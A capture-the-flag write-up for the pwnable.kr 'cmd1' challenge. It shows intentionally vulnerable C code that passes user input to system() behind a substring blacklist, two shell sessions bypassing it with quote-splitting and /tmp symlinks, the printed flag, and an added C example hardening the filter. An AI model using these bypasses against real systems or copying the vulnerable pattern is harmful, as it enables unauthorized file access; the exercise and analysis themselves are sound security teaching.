pwnable.kr-cmd1

Challenge description:

Mommy! what is PATH environment in Linux?

ssh [email protected] -p2222 (pw:guest)

The source of cmd1.c is:

#include <stdio.h>
#include <stdlib.h>   /* putenv, system */
#include <string.h>

/* Blacklist: reject the command if it contains any of these substrings.
 * It only inspects the raw text of the argument, nothing else. */
int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "flag")!=0;
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;
    return r;
}
int main(int argc, char* argv[], char** envp){
    /* PATH is replaced with a bogus directory, so commands must be given by absolute path */
    putenv("PATH=/fuckyouverymuch");
    if(filter(argv[1])) return 0;
    system( argv[1] );   /* hands the argument to /bin/sh -c */
    return 0;
}

It looks like flag, sh and tmp are filtered. That does not matter: the check runs on the raw argument text, so the filter can be bypassed by letting the shell concatenate quoted fragments back into the word:

"/bin/cat 'fl"ag'"

cmd1@ubuntu:~$ ./cmd1 "/bin/cat 'fl"ag'"

mommy now I get what PATH environment is for 🙂

So the final flag is:

mommy now I get what PATH environment is for 🙂


Update: here is another method:

cmd1@ubuntu:~$ ls

cmd1 cmd1.c flag

cmd1@ubuntu:~$ mkdir /tmp/cmd1

cmd1@ubuntu:~$ cd /tmp/cmd1

cmd1@ubuntu:/tmp/cmd1$ ln -s /home/cmd1/cmd1 cmd1

cmd1@ubuntu:/tmp/cmd1$ ls

cmd1

cmd1@ubuntu:/tmp/cmd1$ ln -s /home/cmd1/flag f

cmd1@ubuntu:/tmp/cmd1$ ./cmd1 "/bin/cat f"

mommy now I get what PATH environment is for 🙂

By creating symlinks under /tmp, the filter on flag is bypassed: the argument cmd1 sees is just "/bin/cat f", which contains none of the filtered substrings, while f resolves to the real flag file. Running from inside /tmp/cmd1 with relative paths also keeps "tmp" out of the argument.
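Both bypasses above exploit the same weakness: filter() looks at the argument text, not at what the shell actually executes. The following C program is an added example (not part of the writeup or the challenge) that reproduces the page's filter, adds a hardened variant which removes shell quoting before checking, and shows with constructed argv[1] values which bypass it stops and which it cannot; shell_unquote and filter_unquoted are hypothetical helpers written for this example.

```c
#include <stdio.h>
#include <string.h>

/* The challenge's blacklist, reproduced from cmd1.c: substring match on raw argv[1]. */
int filter(const char *cmd) {
    int r = 0;
    r += strstr(cmd, "flag") != 0;
    r += strstr(cmd, "sh") != 0;
    r += strstr(cmd, "tmp") != 0;
    return r;
}

/* Quote removal as sh performs it before exec: '...' is literal, "..." is literal
 * except that backslash escapes $ ` " \ inside it, and an unquoted backslash escapes
 * the next character. Expansions ($VAR, globs) are not modelled. out needs strlen(in)+1 bytes. */
size_t shell_unquote(const char *in, char *out) {
    size_t n = 0;
    char q = 0;                                  /* active quote char, 0 if none */
    for (const char *p = in; *p; p++) {
        if (q == 0 && (*p == '\'' || *p == '"')) { q = *p; continue; }
        if (q != 0 && *p == q) { q = 0; continue; }
        if (*p == '\\' && q != '\'' && p[1] != 0 &&
            (q == 0 || strchr("$`\"\\", p[1]))) { out[n++] = *++p; continue; }
        out[n++] = *p;
    }
    out[n] = 0;
    return n;
}

/* Hardened variant: apply the blacklist to the text the shell would actually run,
 * so splitting "flag" across quotes no longer hides it. */
int filter_unquoted(const char *cmd) {
    char buf[256];
    if (strlen(cmd) >= sizeof buf) return 1;     /* overlong input: reject */
    shell_unquote(cmd, buf);
    return filter(buf);
}

int main(void) {
    /* Constructed argv[1] values: what cmd1 sees after the caller's shell removed the outer quotes. */
    const char *split  = "/bin/cat 'fl'ag";      /* quote-splitting bypass  */
    const char *linked = "/bin/cat f";           /* f symlinked to the flag */
    printf("raw filter, split argument:      %d\n", filter(split));            /* 0: bypassed */
    printf("unquoted filter, split argument: %d\n", filter_unquoted(split));   /* 1: caught */
    printf("unquoted filter, symlink:        %d\n", filter_unquoted(linked));  /* 0: not visible */
    /* The symlink case marks the limit: no text filter sees what a path resolves to,
     * so the real fix is never to pass argv[1] to system() at all. */
    return 0;
}
```

The third result is the point: normalising the text closes one bypass, but an allowlist of concrete commands run without a shell is the only control that also covers the symlink variant.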
